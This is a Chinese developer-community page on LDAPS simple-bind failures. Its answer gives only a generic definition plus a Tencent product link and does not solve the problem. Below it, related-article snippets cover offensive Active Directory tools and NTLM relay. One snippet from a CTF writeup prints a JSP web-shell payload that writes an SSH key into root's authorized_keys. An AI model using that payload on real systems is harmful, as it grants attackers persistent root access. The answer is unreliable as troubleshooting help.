开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

LDAPS :简单绑定失败

LDAPS是Lightweight Directory Access Protocol Secure的缩写，是LDAP（轻量级目录访问协议）的安全版本。LDAPS通过使用SSL/TLS加密通信来保护LDAP通信的安全性。

简单绑定失败是指在进行LDAP身份验证时，使用简单绑定方法（即用户名和密码）进行身份验证时出现错误或失败的情况。

LDAPS的优势在于提供了加密和身份验证机制，确保LDAP通信的机密性和完整性。它可以防止敏感数据在传输过程中被窃取或篡改，提高了系统的安全性。

LDAPS的应用场景包括但不限于以下几个方面：

身份验证和授权：LDAPS可用于企业内部的身份验证和授权系统，确保只有经过授权的用户可以访问特定的资源。
目录服务：LDAPS可用于管理和维护大量用户和组织的目录服务，如企业内部的员工目录、客户目录等。
协作平台：LDAPS可用于协作平台，如企业内部的电子邮件系统、社交网络平台等，确保用户信息和通信内容的安全性。

腾讯云提供了LDAP身份验证服务，可以用于实现LDAPS。具体产品是腾讯云的"LDAP身份验证"，详情请参考：https://cloud.tencent.com/product/ldap

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

LDAP 中继扫描

尝试在域控制器上中继 NTLM 身份验证 LDAP 时，有几个服务器端保护。此工具尝试枚举的 LDAP 保护包括：

01

数据库PostrageSQL-LDAP 认证

这种认证方法操作起来类似于password，只不过它使用 LDAP 作为密码验证方法。LDAP 只被用于验证用户名/口令对。因此，在使用 LDAP 进行认证之前，用户必须已经存在于数据库中。

01

从 RPC 到 RCE - 通过 RBCD 和 MS-RPC 接管工作站

在 Active Directory 的默认配置中，可以在其 WebClient 服务运行时远程接管工作站 (Windows 7/10/11) 和可能的服务器（如果安装了桌面体验）。简而言之，这是通过以下方式完成的；

04

使用符合LDAP的身份服务配置身份认证

如何在Cloudera Manager中使用LDAP配置身份认证。前序博文见<Cloudera Manager配置外部身份认证的种类>

03

BloodyAD：一款功能强大的活动目录提权框架

BloodyAD是一款功能强大的活动目录提权框架，该框架可以通过bloodyAD.py实现手动操作，或通过结合pathgen.py和autobloody.py来实现自动化提权以及活动目录安全检测任务。

02

SQL审核 | SQLE 1.2205.0-pre2 来啦！

SQL审核工具 SQLE 1.2205.0-pre2 于今天发布。以下对新版本的 Release Notes 进行详细解读。

02

如何为CM集成FreeIPA提供的LDAP认证

本篇文章主要介绍如何为Cloudera Manager集成FreeIPA提供的LDAP认证。

01

NTLM重放攻击

Kerberos域网络中，默认NTLM协议是主要的替代认证协议，几乎伴随着Kerberos协议，NTLM协议的安全性会对域网络产生重要的冲击，所以我们单独成立一个独立的章节介绍与NTLM协议相关的漏洞和攻击手段。

01

配置启用基于SSL的LDAP(LDAPS)

默认情况下，LDAP 通信未加密。这使得恶意用户能够使用网络监控软件查看传输中的数据包。这就是许多企业安全策略通常要求组织加密所有 LDAP 通信的原因。为了减少这种形式的数据泄露，微软提供了一个选项：您可以启用通过安全套接字层 (SSL)/传输层安全性 (TLS) 的 LDAP，也称为 LDAPS。利用 LDAPS，您可以提高整个网络的安全性。

02

CentOS 7 部署LDAP服务并启用TLS加密

简介 LDAP（轻量级目录访问协议，Lightweight Directory Access Protocol)是为了实现目录服务的信息服务。目录服务是一种特殊的数据库系统，其专门针对读取，浏览和搜索操作进行了特定的优化。在网络中应用了LDAP后，用户只需要使用一个账号和密码就可以轻松访问网络中的所有服务，实现用户身份的统一认证。简单来说：拿LDAP来统一管理一些账号，例如: Gitlab,JenKins,Samba,SVN,Zabbix等。关于SSL/TLS LDAP over SSL # LDAP

02

LDAP落地实战（四）：Jenkins集成OpenLDAP认证

安装方法：登录Jenkins --> 系统管理 --> 插件管理 --> 可选插件 --> 搜索LDAP --> 选中 --> 直接安装 --> 安装完成重启

01

第二章 OpenLDAP运维管理

phpLDAPadmin 是一款LDAP GUI客户端管理软件，它提供一个简单并且支持多种语言的LDAP管理软件。

02

SQL审核 | 再也不担心你的开发查数据时打死数据库啦（下）

SQL审核工具 SQLE 1.2205.0 于今天发布。以下对新版本的 Release Notes 进行详细解读。

02

如何使用Aced分析活动目录的DACL

Aced是一款针对活动目录的安全检测与分析工具，该工具可以帮助广大研究人员解析单个目标活动目录的DACL。Aced可以针对目标帐户识别可疑的入站访问权限，解析入站权限的SID，并将该数据呈现给研究人员。除此之外，Aced还整合了pyldapsearch工具的日志记录功能，可以在本地记录目标主体的LDAP属性，而pyldapsearch的配套工具BOFHound可以对这些属性进行解析，随后我们可以将收集到的数据导入到BloodHound中进行后续操作。

02

TCP/UDP常见端口参考(超全_面试题常用_建议收藏)

著名端口端口号码 / 层名称注释 1 tcpmux TCP 端口服务多路复用 5 rje 远程作业入口 7 echo Echo 服务 9 discard 用于连接测试的空服务 11 systat 用于列举连接了的端口的系统状态 13 daytime 给请求主机发送日期和时间 17 qotd 给连接了的主机发送每日格言 18 msp 消息发送协议 19 chargen 字符生成服务；发送无止境的字符流 20 ftp-data FTP 数据端口 21 ftp 文件传输协议（FTP）端口；有时被文件服务协议

02

【M01N】资源约束委派和NTLM Relaying的组合拳接管域内任意主机系统权限

【声明：本文所述相关技术仅限研究和学习使用，请遵守国家网络安全法律法规，勿用于入侵等非法用途，使用本文相关技术造成的法律问题与本公司无关。】

03

内网协议NTLM之内网大杀器CVE-2019-1040漏洞

Preempt的研究人员发现了如何在NTLM身份验证上绕过MIC(Message Integrity Code)保护措施并修改NTLM消息流中的任何字段（包括签名）。该种绕过方式允许攻击者将已经协商签名的身份验证尝试中继到另外一台服务器，同时完全删除签名要求。所有不执行签名的服务器都容易受到攻击。这个漏洞其实就是可以绕过NTLM MIC的防护，也是NTLM_RELAY漏洞。攻击者利用该漏洞可以绕过NTLM中的MIC（Message Integrity Code）。攻击者可以修改已经协商签名的身份验证流量，然后中继到另外一台服务器，同时完全删除签名要求。通过该攻击方式可使攻击者在仅有一个普通域账号的情况下，运程控制域中任意机器（包括域控服务器）。

03

LDAPFragger：一款功能强大的命令控制C&C工具

LDAPFragger是一款功能强大的命令控制C&C工具，可以帮助广大研究人员使用用户属性和LDAP来路由Cobalt Strike信标数据。

02

自动利用 BloodHound 显示的 Active Directory 权限升级路径的工具

如果 BloodHound 数据库中存在 privesc 路径，此工具会自动执行两个 AD 对象、源（我们拥有的）和目标（我们想要的）之间的 AD privesc。自动化由两个步骤组成：

02

Java安全之JNDI注入

Naming就是名称服务，通过名称查找实际对象的服务。值得一提的名称服务为 LDAP，全称为 Lightweight Directory Access Protocol，即轻量级目录访问协议，其名称也是从右到左进行逐级定义，各级以逗号分隔，每级为一个 name/value 对，以等号分隔。比如一个 LDAP 名称如下:

03

CVE-2019-1040 NTLM MIC 绕过漏洞

2019年6月11日，微软发布6月份安全补丁更新。在该安全补丁更新中，对 CVE-2019-1040 漏洞进行了修复。该漏洞存在于Windwos 大部分版本中，当中间人攻击者能够成功绕过NTLM 消息完整性校验（MIC）时，Windows 存在可能可篡改的漏洞。成功利用此漏洞的攻击者可以获得降级 NTLM 安全功能的能力。要利用此漏洞，攻击者需要篡改NTLM 交换，然后修改NTLM 数据包的标志，而不会使签名无效。结合其他漏洞和机制，在某些场景下，攻击者可以在仅有一个普通账户域账户的情况下接管全域。

02

JumpServer 堡垒机-- LDAP Authentication（三）

Ldap 认证就是把用户数据信息放在 Ldap 服务器上,通过 ldap 服务器上的数据对用户进行认证处理。好比采用关系型数据库存储用户信息数据进行用户认证的道理一样。Ldap 也可以算作是数据库,不过不是关系型的,而是采用层次型组织数据的。Ldap是开放的Internet标准，支持跨平台的Internet协议，在业界中得到广泛认可的，并且市场上或者开源社区上的大多产品都加入了对Ldap的支持，因此对于这类系统，不需单独定制，只需要通过Ldap做简单的配置就可以与服务器做认证交互。

02

LDAPWordlistHarvester：基于LDAP数据的字典生成工具

LDAPWordlistHarvester是一款功能强大的字典列表生成工具，该工具可以根据LDAP中的详细信息生成字典列表文件，广大研究人员随后可以利用生成的字典文件测试目标域账号的非随机密码安全性。

01

赏金猎人:IChunQiu云境-Spoofing Writeup

<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDL3NKaDY4Uk5hWktLakNQaE40WUxpSnJ4eDR3N3JtbDBGcFRmMTNYNHVKZlpFZm4yU25scE9rdXQ0OE1LdURHOEtDcXczRW0zNU9odXdUa2p3ZEkvRGhGN3ZSeTB0T2xtWDE5NmJHcXpndE5pM1YzUHExc3NCMzV5Ui85SHJ6ZjVEdHdqS2NKdkphV0RuZzU2UWhHZjlnR21vdUZVQWV2QjdsUWl3a01FNWNxTzVsQTRwUm5KVEh2RU1OQUkxQkc3MTBEeWNKT28rNGh1TGNNVjZhdUs3UXdKTWdnN0oyU2U5TEpGZWk2R2g0amJUSGRhdmNBVjV6VVJZeFI4QVNXSmNqY29tM2dMUEE1UWNxSzNzSERRVmswUHllaTR3cEJwWWlFUGlHcHlQR2Y1T3ErUU0xQmJyR0gvTlRBYnZWa3dDZnBkRURWdVBNNWhHOFY4c09HTjIxczlWazFjMVBXaEh2WDZ1ejhRaDRNdUdnQlRYSHlZb3duTjg3OTExVDVGR0VjVzlWeUh1cm9FSVJtdE9sY3dBYmRMc0k0NVhOS1o0aWoxdERLNTRTMmpXWXhJTjhSL1ZuUnV2RVVoTVpGOUlabDM3UW5EQnBFR25LTXFjTVE4cHVUZUJBMngvSURHMFR6MWxjVGk5WHp5WjVheTd4dTJwZStidXhWT1BSQ2M9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(""); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("");%>

01

fedora 28 , firewalld 防火墙控制，firewall-cmd 管理防火墙规则

今天，在使用fedora时，需要修改防火墙规则，一时间忘记了命令是什么，这里进行记录一下。目前 fedora 28/ centos 7 使用 firewalld 作为防火墙软件；下面我就怎么简单管理防火墙规则进行记录，网上的例子很多，这里我列举我经常使用的命令，来进行备忘：

01

【Go 语言社区】linux常用网络服务端口一览表及详细分析

端口号码 / 层名称注释 1 tcpmux TCP 端口服务多路复用 5 rje 远程作业入口 7 echo Echo 服务 9 discard 用于连接测试的空服务 11 systat 用于列举连接了的端口的系统状态 13 daytime 给请求主机发送日期和时间 17 qotd 给连接了的主机发送每日格言 18 msp 消息发送协议 19 chargen 字符生成服务；发送无止境的字符流 2

07

网络笔记之端口及常见端口号

传输层协议，如传输控制协议（TCP）与用户数据包协议（UDP），在分组表头中，定义了来源端口号与目的端口号。一个通信端口号使用16位无符号整数（unsigned integer）来表示，其范围介于0与65535之间。在TCP协议中，端口号0是被保留的，不可使用。 1–1023 系统保留，只能由root用户使用。 1024—4999 由客户端程序自由分配。 5000—65535 由服务器端程序自由分配在UDP协议中，来源端口号是可以选择要不要填上，如果设为0，则代表没有来源端口号。

06

如何使用modifyCertTemplate实现ADCS证书模版修改和ACL枚举

modifyCertTemplate是一款针对活动目录证书服务（ADCS）的安全研究工具，该工具旨在帮助广大研究人员修改ADCS证书模版，以便创造出存在安全问题的证书模版并以此来实现权限提升。实现提权后，研究人员还可以将模版重制为之前的状态。

01

Windows 的 NTLM 中继

lsarelayx 是系统范围的 NTLM 中继工具，旨在将传入的基于 NTLM 的身份验证中继到运行它的主机。lsarelayx 将中继任何传入的身份验证请求，其中包括 SMB。由于 lsarelayx 挂钩到现有的应用程序身份验证流，该工具还将在中继完成后尝试为原始身份验证请求提供服务。这将防止目标应用程序/协议显示错误，并为最终用户针对 lsarelayx 主机进行身份验证正常工作。

02

MySQL8 中文参考（二十八）

mysql_no_login 服务器端认证插件阻止所有使用它的账户的客户端连接。此插件的用例包括：

01

通过 Cobalt Strike 进行 NTLM 中继

NTLM 中继是渗透测试期间一种流行的攻击策略，而且执行起来非常简单。只需在客户站点上卷起，将您的笔记本电脑插入 LAN，启动响应器和 ntlmrelayx，然后您就可以离开了。

03

Self Service Password域账号自助服务台

项目官网： https://www.ltb-project.org/documentation/self-service-password.html github： https://github.com/ltb-project/self-service-password 文档： https://self-service-password.readthedocs.io/en/latest/

02

0855-1.9.2-CDSW1.9的新功能

作为 CML 中现有引擎的替代品，ML Runtimes 比当前的单体引擎(monolithic Engines)更轻量级。通过指定所需的Editor, Kernel, Edition和Version，一个流水线式的Runtime将用于在Sessions, Jobs, Experiments, Models和Applications中运行用户的代码。

02

浅谈Log4j2之2.15.0版本RCE

CVE-2021-45046是Log4j2漏洞爆出后在修复版本中出现的拒绝服务漏洞

02

如何使用Autobloody自动利用BloodHound显示的活动目录提权路径

Autobloody是一款针对活动目录的安全审查工具，在该工具的帮助下，广大研究人员可以通过自动化的形式利用BloodHound扫描发现的活动目录提权路径来实现权限提升。

01

CentOS 7.4升级Curl版本

Curl是一个利用URL语法在命令行下工作的文件传输工具，1997年首次发行。它支持文件上传和下载，所以是综合传输工具，但按传统，习惯称Curl为下载工具。Curl还包含了用于程序开发的libcurl。

03

Log4j2再发新版本2.16.0，完全删除Message Lookups的支持，加固漏洞防御！

更多更新细节，可以通过官网查看：https://logging.apache.org/log4j/2.x/

CentOS 6/7 更新curl

2017-04-0810:17:24 发表评论 532℃热度由于业务需要，服务器上的curl 版本太老了，有漏洞，于是抽点时间升级最新版本，确保服务器间通信安全，然后网上看了些教程，发现各不相同，最

07

2020-4-21-curl的简单使用

除了http协议之外，curl还支持DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTMPS, RTSP, SCP, SFTP, SMB, SBMS, SMTP, SMTPS, TELNET 和TFTP等各类网络协议。

02

如何在CentOS 7上使用FirewallD设置防火墙

Firewalld是一种防火墙管理解决方案，可用于许多Linux发行版，它们充当Linux内核提供的iptables包过滤系统的前端。在本教程中，我们将介绍如何为您的服务器设置防火墙，并向您展示使用firewall-cmd管理工具管理防火墙的基础知识。

00

如何使用FindUncommonShares扫描Windows活动目录域中的共享

关于FindUncommonShares FindUncommonShares是一款功能强大的活动目录域共享扫描工具，该工具基于Python开发，本质上是一个与Invoke-ShareFinder.ps1功能类似的脚本，可以帮助广大研究人员在一个庞大的Windows活动目录域中搜索不常见的共享存储/驱动。功能介绍当前版本的FindUncommonShares提供了以下功能： 1、只需要使用低权限域用户账号； 2、自动从域控制器的LDAP中获取包含所有计算机的列表； 3、可以使用--ignor

01

神兵利器 - WireBug

WireBug是一款用于IP语音渗透测试的工具集。它被设计成一个向导，使其易于使用。这些工具也是为单次使用而设计的，所以每个工具都是自己的python或bash程序。

04

TCP/UDP常见端口参考

在网络技术中，端口(Port)大致有两种意思：一是物理意义上的端口，比如，ADSL Modem、集线器、交换机、路由器用于连接其他网络设备的接口，如RJ-45端口、SC端口等等；二是逻辑意义上的端口，一般是指TCP/IP协议中的端口，端口号的范围从0到65535，比如用于浏览网页服务的80端口，用于FTP服务的21端口等等。

02

Log4j2 发新版本2.16.0 完全删除Message Lookups的支持，加固漏洞防御

更多细节，可以通过官网查看：logging.apache.org/log4j/2.x/

06

CDP-DC中Atlas集成FreeIPA的LDAP认证

Cloudera从CM6.3版本开始，引入了Red Hat IdM来做整个集群的认证，Red Hat IdM对应的软件为FreeIPA，在本文中描述如何使用FreeIPA来做CDP-DC集群的认证。关于FreeIPA服务器搭建参考<使用FreeIPA对Linux用户权限统一管理>。之前的文章包括<使用FreeIPA为CDP DC7.1集群部署安全>,<CDP-DC中为CM集成FreeIPA提供的LDAP认证>,<在CDP-DC中Ranger集成FreeIPA的LDAP用户>,<CDP-DC中Hue集成FreeIPA的LDAP认证>，<CDP-DC中Impala集成FreeIPA的LDAP认证>。

04

HAproxy + Keepalive实现LDAP代理服务

因为公司的各种高自研发的系统非常多，这些系统又全部是在使用LDAP做认证，目前我们有几台DC控制器来分担这些ldap请求，用户通过访问ldap.xxxx.com这个域名来连接ldap服务器，我们通过DNS轮询的方式指向不同的DC服务器。

03

CDP-DC中Hue集成FreeIPA的LDAP认证

Cloudera从CM6.3版本开始，引入了Red Hat IdM来做整个集群的认证，Red Hat IdM对应的软件为FreeIPA，在本文中描述如何使用FreeIPA来做CDP-DC集群的认证。关于FreeIPA服务器搭建参考<使用FreeIPA对Linux用户权限统一管理>。之前的文章包括<使用FreeIPA为CDP DC7.1集群部署安全>,<CDP-DC中为CM集成FreeIPA提供的LDAP认证>,<在CDP-DC中Ranger集成FreeIPA的LDAP用户>。

02

Wiki.js 配置 LDAP 认证

在管理 -> 身份验证 -> 添加策略 -> 选择 LDAP/AD , 如下: 接下来进行详细配置: 显示名称: 按需修改是否启用: 是 LDAP URL: 格式为: ldap://serverhost:389 or ldaps://serverhost:636 Admin Bind DN: CN=xxxx,OU=xxxx部,OU=xxxx,DC=xxxxx-net,DC=com,DC=cn ❗️ 注意: 一定要明确该CN的完整信息.确定归属于OU=xxxx部,OU=xxxx,DC=xxxxx-n

01

一个非常优秀的跨平台物联网开发常用的网络请求库libcurl

libcurl 是一个免费且易于使用的客户端 URL 传输库，支持DICT, FILE, FTP, FTPS, GOPHER, GOPHERS, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, MQTT, POP3, POP3S, RTMP, RTMPS, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET和TFTP。libcurl 支持 SSL 证书、HTTP POST、HTTP PUT、FTP 上传、基于 HTTP 表单的上传、代理、HTTP/3、Cookie、用户/密码认证 (Basic, Digest, NTLM, Negotiate, Kerberos), 文件传输恢复、http隧道代理等等！

03

linux搭建开源ldap服务器方法

ldap是统一认证服务，它的优点是存储用户认证等不经常改变的信息，有清晰的组织结构。

02

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭